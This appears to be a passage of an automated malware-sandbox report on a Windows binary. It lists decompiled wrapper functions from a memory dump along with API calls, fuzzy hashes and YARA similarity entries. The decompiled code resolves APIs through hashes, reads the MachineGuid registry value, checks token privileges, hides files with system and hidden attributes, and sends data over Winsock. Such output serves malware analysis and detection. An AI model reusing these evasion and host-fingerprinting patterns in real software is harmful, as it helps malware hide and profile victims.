SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C

Strings

5,A, xrefs: 0041284A

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Path
String ID: 5,A
API String ID: 2875597873-3842761921
Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406086, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}

0x00406094
0x004060a8
0x004060ab

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}

0x00402c10
0x00402c15
0x00402c1b
0x00402c1e

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52, Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}

0x00404a56
0x00404a65
0x00404a6a
0x00404ad1
0x00404ad1
0x00404a6c
0x00404a71
0x00404a79
0x00404a85
0x00404a9a
0x00404a9e
0x00404acb
0x00000000
0x00404aa0
0x00404aac
0x00404abc
0x00404ac1
0x00404ac6
0x00404ac6
0x00404a9e
0x00404ad9

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}

0x004060c6
0x004060d5
0x004060d8
0x004060f4
0x004060f6
0x004060fb
0x0040610a
0x00406115
0x0040611c
0x0040611e
0x00406121
0x00000000
0x0040612a
0x0040612f

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Uniqueness

Uniqueness Score: -1.00%

Function 00404056, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00404056(void* __ebx, intOrPtr _a4) {
				intOrPtr* _t5;
				void* _t6;
				void* _t14;

				_t14 = E00402B7C(0x208);
				if(_t14 == 0) {
					L4:
					return 0;
				}
				E00402B4E(_t14, 0, 0x208);
				_t5 = E004031E5(__ebx, 0xa, 0xc7f71852, 0, 0);
				_t6 =  *_t5(0, _a4, 0, 0, _t14); // executed
				if(_t6 != 0) {
					E00402BAB(_t14);
					goto L4;
				}
				return _t14;
			}

0x00404066
0x0040406b
0x004040a0
0x00000000
0x004040a0
0x00404072
0x00404083
0x0040408f
0x00404093
0x0040409a
0x00000000
0x0040409f
0x00000000

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateFolderPathProcess
String ID:
API String ID: 398210565-0
Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA

Uniqueness

Uniqueness Score: -1.00%

Function 00403C62, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}

0x00403c68
0x00403c70
0x00403c78
0x00403c82
0x00403c8b
0x00403c8f
0x00403c72
0x00403c76
0x00403c76

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Uniqueness

Uniqueness Score: -1.00%

Function 0040642C, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}

0x0040643c
0x00406445
0x00406454

APIs

GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Uniqueness

Uniqueness Score: -1.00%

Function 004044A7, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044A7(WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				long _t9;
				void* _t10;

				E004031E5(_t10, 0, 0xf66be5a2, 0, 0);
				_t9 = GetPrivateProfileStringW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t9;
			}

0x004044b4
0x004044cb
0x004044ce

APIs

GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction ID: e6a1e737d40be81796f932fb1ea6dd5b05bd2579ff383e5fb5a00b3a8c54de51
Opcode Fuzzy Hash: 4d7b33c0f443fd34e1b412248ee3a3a873a37a73c8fd0d440c03b52d081651e8
Instruction Fuzzy Hash: 52D0C27604410DBFDF025EE1DC05CAB3F6EEB48354B408425BE2895021D637DA71ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 004049B3, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049B3(void* _a4, WCHAR* _a8, WCHAR* _a12, DWORD* _a16, void* _a20, DWORD* _a24) {
				int _t8;
				void* _t9;

				E004031E5(_t9, 2, 0xdc1011d7, 0, 0);
				_t8 = SHGetValueW(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t8;
			}

0x004049c1
0x004049d8
0x004049db

APIs

SHGetValueW.SHLWAPI(?,?,?,?,?,?,00000002,DC1011D7,00000000,00000000), ref: 004049D8

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction ID: 49132b90e07f175002bb52db16c83daeb6fc20f74050e769a3614ef6a11dfcc0
Opcode Fuzzy Hash: d2b5c774d03033d136a946971d24419cad296dffbc8af53813a044fec6ac893d
Instruction Fuzzy Hash: 71D0923214020DBBDF026ED1DC02FAA3F2AAB09758F104014FB18280A1C677D631AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00404EEA, Relevance: 1.5, APIs: 1, Instructions: 16
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}

0x00404eed
0x00404ef2
0x00404efd
0x00404efd
0x00404f07
0x00404f0e

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Uniqueness

Uniqueness Score: -1.00%

Function 004049DC, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049DC(void* _a4, int _a8, WCHAR* _a12, DWORD* _a16) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 2, 0xeca4834b, 0, 0);
				_t6 = SHEnumKeyExW(_a4, _a8, _a12, _a16); // executed
				return _t6;
			}

0x004049ea
0x004049fb
0x004049fe

APIs

SHEnumKeyExW.SHLWAPI(?,?,?,?,00000002,ECA4834B,00000000,00000000), ref: 004049FB

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction ID: fb20b8ae34c3d99b6a2ec1f59af3280c7c0bbdac25ffdbb9458fe1f208d0831b
Opcode Fuzzy Hash: c447628955f84b1dbba2996d5b83f9d73ffd86954af03f25284de3baf63e54d0
Instruction Fuzzy Hash: 45D0023114430D7BEF115ED1DC06F597F1ABB49B54F104455BB18680E19673A6305755

Uniqueness

Uniqueness Score: -1.00%

Function 00403BD0, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}

0x00403bdd
0x00403beb
0x00403bee

APIs

MoveFileExW.KERNEL32(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF3, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040427D, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}

0x0040428a
0x00404297
0x0040429a

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404A19, Relevance: 1.5, APIs: 1, Instructions: 13
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}

0x00404a27
0x00404a35
0x00404a38

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08, Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F, Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNEL32(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00408B2C, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B2C(struct HINSTANCE__* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe0cf5891, 0, 0);
				_t4 = FreeLibrary(_a4); // executed
				return _t4;
			}

0x00408b39
0x00408b41
0x00408b44

APIs

FreeLibrary.KERNELBASE(?,00000000,E0CF5891,00000000,00000000), ref: 00408B41

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction ID: 291ca984118c00001a410e8fe814b9ebecee15bf7cc635df9db1cfcd8d33b31d
Opcode Fuzzy Hash: 450bda5b085385e41399d185e0c6d92315b9743f5e19a8ad8642e29fe69941a3
Instruction Fuzzy Hash: 0EB092B004820C3EAE002EF19C05C3B3E8DEA4454870044757E0CE5051EA36DE1110A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

